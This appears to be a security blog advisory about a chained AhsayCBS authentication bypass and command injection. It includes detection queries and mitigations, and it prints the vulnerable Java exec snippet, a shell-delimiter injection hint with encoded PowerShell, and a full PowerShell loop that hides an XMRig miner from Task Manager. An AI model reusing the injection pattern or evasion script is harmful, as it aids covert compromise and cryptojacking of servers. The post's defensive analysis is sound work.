AhsayCBS Dual Zero-Day Exploit Chain: CVE-2026-105133 & CVE-2026-105134 Chained for Unauthenticated RCE

AhsayCBS Dual Zero-Day Exploit Chain Architecture
📌
Security Roundup Series: Week of October 9, 2026 • 4 min read deep dive
🚨
Vulnerability Intelligence: CVE ID: CVE-2026-105133 & CVE-2026-105134 (CWE-287 (Improper Authentication) / CWE-78 (OS Command Injection)) Severity: CRITICAL (CVSS 9.3) Status: Actively Exploited in the Wild (First Observed Oct 7, 2026 by Huntress) Affected Systems: AhsayCBS Enterprise Backup Server versions 9.x through 10.3.4 Fixed In: AhsayCBS Security Hotfix Pending / Workaround Required

On October 7 and 8, 2026, security analysts at Huntress uncovered an ongoing campaign weaponizing two zero-day vulnerabilities in AhsayCBS, a popular multi-tenant enterprise backup solution used widely by Managed Service Providers (MSPs). By chaining an authentication bypass in the central API layer (CVE-2026-105133) with an operating system command injection vulnerability in the replication subsystem (CVE-2026-105134, CVSS 9.3), attackers obtain unauthenticated SYSTEM-level remote code execution, deploying persistence web shells and stealthy XMRig cryptocurrency miners designed to evade detection by Windows Task Manager.

Exploit Chain Anatomy

The attack proceeds in two distinct stages across the AhsayCBS Java servlet infrastructure:

Stage 1: Authentication Bypass (CVE-2026-105133)

The authentication verification method checkSysPwd() inside com/ahsay/obs/api/ApiStructsAction.java processes system administration API requests. When an attacker passes a specially manipulated random parameter alongside an empty authentication token, the validation function enters a logic branch that assumes pre-authenticated state, returning an administrative session token without validating the master password.

Stage 2: OS Command Injection (CVE-2026-105134)

Armed with the forged administrative token, the attacker targets the Replication Receiver API endpoint at /rps/api/json/UpdateReceivers.do. This endpoint processes replication host addresses to synchronize secondary backup stores. The handler takes user-supplied values from the random and receiver configuration fields and interpolates them directly into a shell command without sanitization:

// Decompiled snippet from UpdateReceivers.do handler
String receiverHost = jsonObject.getString("receiver_ip");
String cmd = "ping -n 1 " + receiverHost; // Command string constructed via concatenation
Runtime.getRuntime().exec(cmd); // Direct execution via cmd.exe

By injecting shell delimiters (e.g., & powershell -enc ...), the attacker executes arbitrary commands under the permissions of the AhsayCBS service (typically NT AUTHORITY\SYSTEM on Windows servers).

Post-Exploitation & Evasion: The Taskgmr.ps1 Script

Following initial access, the attackers deploy a persistent web shell into the Tomcat webroot and drop a compiled XMRig mining binary renamed as edge.exe to impersonate the legitimate Microsoft Edge browser executable. To ensure the CPU-intensive miner remains undetected by system administrators, the attackers launch an evasive background PowerShell script named Taskgmr.ps1:

# Deobfuscated logic of Taskgmr.ps1 evasion loop
while ($true) {
    $proc = Get-Process -Name "taskmgr" -ErrorAction SilentlyContinue
    if ($proc) {
        # Task Manager is open: Kill miner immediately to hide high CPU usage
        Get-Process -Name "edge" -ErrorAction SilentlyContinue | Stop-Process -Force
    } else {
        # Task Manager closed: Ensure miner is actively running
        $miner = Get-Process -Name "edge" -ErrorAction SilentlyContinue
        if (-not $miner) {
            Start-Process -FilePath "C:\ProgramData\Ahsay\edge.exe" -WindowStyle Hidden
        }
    }
    Start-Sleep -Seconds 2
}

Detection Telemetry & Threat Hunting

Defenders managing AhsayCBS servers should immediately search for evidence of exploitation:

🔍
Sysmon / PowerShell Event ID 4104 Hunting Query:
EventID: 4104 AND ("Taskgmr.ps1" OR "edge.exe" OR "/rps/api/json/UpdateReceivers.do")

Audit process trees for anomalous child processes spawned by java.exe or tomcat.exe:

# Windows CLI: Query processes spawned by Ahsay Tomcat service
wmic process where "name='cmd.exe' or name='powershell.exe'" get ProcessId,ParentProcessId,CommandLine

Immediate Mitigations

  1. Network Perimeter Containment: Disconnect or block external internet access to all AhsayCBS management ports (default ports 80, 443, 8080, 8443) immediately. Restrict access strictly to trusted administrative IP addresses via VPN.
  2. Terminate Malicious Processes: Search for and terminate any suspicious instances of edge.exe running from directories outside C:\Program Files (x86)\Microsoft\Edge\, as well as background powershell.exe processes running Taskgmr.ps1.
  3. Inspect Webroot for Backdoors: Check C:\Program Files\AhsayCBS\webapps\ for newly created .jsp or .jspx files modified within the past 7 days.

Read more

Brecha de Datos Médicos en Photon Health

Filtración en Photon Health: Zero-Day de Inyección SQL en Metabase Expone Recetas Médicas de Pacientes

📌Security Roundup Series: Semana del 9 de Octubre de 2026 • 4 min read deep dive🏛️Incident Overview: Target / Organization: Photon Health, Inc. (Plataforma de Prescripción Médica Digital) Threat Actor / Attribution: Actor Desconocido (Extorsión Financiera) Impact / Records Compromised: Nombres de pacientes, direcciones, números de teléfono, fechas de nacimiento, recetas médicas completas

By James Luther